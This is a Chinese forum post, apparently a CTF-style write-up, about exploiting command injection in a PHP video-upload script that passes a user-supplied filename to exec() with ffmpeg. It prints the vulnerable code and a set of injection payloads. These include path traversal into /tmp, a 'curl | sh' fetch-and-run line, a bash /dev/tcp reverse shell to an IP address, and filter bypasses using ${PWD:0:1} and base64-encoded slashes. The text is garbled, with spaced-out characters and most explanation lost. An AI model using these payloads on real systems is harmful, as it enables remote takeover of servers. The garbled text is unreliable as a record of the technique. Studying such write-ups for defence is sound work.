搜索

[1105] 2020-07-22_每日一问:记一次命令注入RCE

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-16
2020-07-22_每日一问:记一次命令注入RCE R C E C h a b u g   C h a B u g   2 0 2 0 - 0 7 - 2 2 q q C T F C T F o n e i n s t a c k   i n d e x . p h p r o o t 1 .   < ? p h p 2 .   h e a d e r ( ' C o n t e n t - T y p e :   t e x t / h t m l ;   c h a r s e t = u t f - 8 ' ) ; 3 .   / / e r r o r _ r e p o r t i n g ( 0 ) ; 4 .   $ u p l o a d _ d i r   =   ' u p l o a d s / ' ; 5 .   $ i s F f m p e g   =   i s s e t ( $ _ P O S T [ ' i s F f m p e g ' ] )   ?   ( b o o l e a n ) ( $ _ P O S T [ ' i s F f m p e g ' ] )   :   f a l s e ; 6 .   $ s a v e   =   i s s e t ( $ _ P O S T [ ' s a v e ' ] )   ?   $ u p l o a d _ d i r   .   $ _ P O S T [ ' s a v e ' ]   :   f a l s e ; 7 .   $ f i l e n a m e   =   i s s e t ( $ _ F I L E S [ ' f i l e n a m e ' ] )   ?   $ _ F I L E S [ ' f i l e n a m e ' ] [ ' n a m e ' ]   :   f a l s e ; 8 .   i f   ( $ i s F f m p e g   & &   i s s e t ( $ _ F I L E S ) )   { 9 .           i f   ( $ f i l e n a m e   & &   $ s a v e   & &   $ _ F I L E S [ ' f i l e n a m e ' ] [ " t y p e " ]   = =   ' v i d e o / b l o b ' )   { 1 0 .                   i f   ( m o v e _ u p l o a d e d _ f i l e ( $ _ F I L E S [ ' f i l e n a m e ' ] [ " t m p _ n a m e " ] ,   $ s a v e ) )   { 1 1 .                           $ l a s t _ l i n e   =   e x e c ( " f f m p e g   - i   "   .   $ s a v e   .   "   - h i d e _ b a n n e r " ) ; 1 2 .                         / /   e c h o   ' s u c c e s s ' ; 1 3 .                   }   e l s e   { 1 4 .                           / / e c h o   ' e r r o r ' ; 1 5 .                           u n l i n k ( $ s a v e ) ; 1 6 .                           u n l i n k ( $ _ F I L E S [ ' f i l e n a m e ' ] [ ' t m p _ n a m e ' ] ) ; 1 7 .                   } 1 8 .           } 1 9 .   }   e l s e   { 2 0 .           s h o w _ s o u r c e ( _ _ F I L E _ _ ) ; 2 1 .   } / d a t a / w w w r o o t / d e f a u l t / i n d e x . p h p
p h p 1 .   2 .   s h e l l   访   h t t p : / / 1 2 3 . 5 7 . 2 2 3 . 3 0 / u p l o a d s / a a . p h p   4 0 4 访   h t t p : / / 1 2 3 . 5 7 . 2 2 3 . 3 0 / u p l o a d s /     u p l o a d s e l s e   s h e l l   h t t p : / / 1 2 3 . 5 7 . 2 2 3 . 3 0 / a a . p h p   访 4 0 4       t m p   m o v e _ u p l o a d e d _ f i l e . . / m o v e _ u p l o a d e d _ f i l e / t m p / . . /
  e x e c d n s l o g  
  b a s h s h e l l s h e l l     e x e c ( ) 姿 姿 1 .   c u r l c u r l 2 .         1 .   b a s h   - i   > &   / d e v / t c p / i p / 8 0 8 0   0 > & 1 / m o v e _ u p l o a d e d _ f i l e 1 .   / . . / . . / . . / . . / . . / t m p / x x ; c u r l   1 0 . 1 0 . 1 0 . 1 0   | s h   ; 2 .   . . / . . / . . / . . / . . / . . / t m p / a s d f a s d . s h ; b a s h   $ ( p h p   - r   " p r i n t ( c h r ( 4 7 ) ) ; " ) t m p $ ( p h p   - r   " p r i n t ( c h r ( 4 7 ) ) ; " 3 .   / . . / . . / . . / . . / . . / t m p / x x ; b a s h   - i   > &   $ { P W D : 0 : 1 } d e v $ { P W D : 0 : 1 } t c p $ { P W D : 0 : 1 } 1 2 3 . 5 7 . 2 2 3 . 3 0 4 .   e c h o   ` e c h o   L w o = | b a s e 6 4   - d ` t m p
L i n u x L i n u x     i n d e x . p h p r o o t b a s h m o v e _ u p l o a d e d _ f i l e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理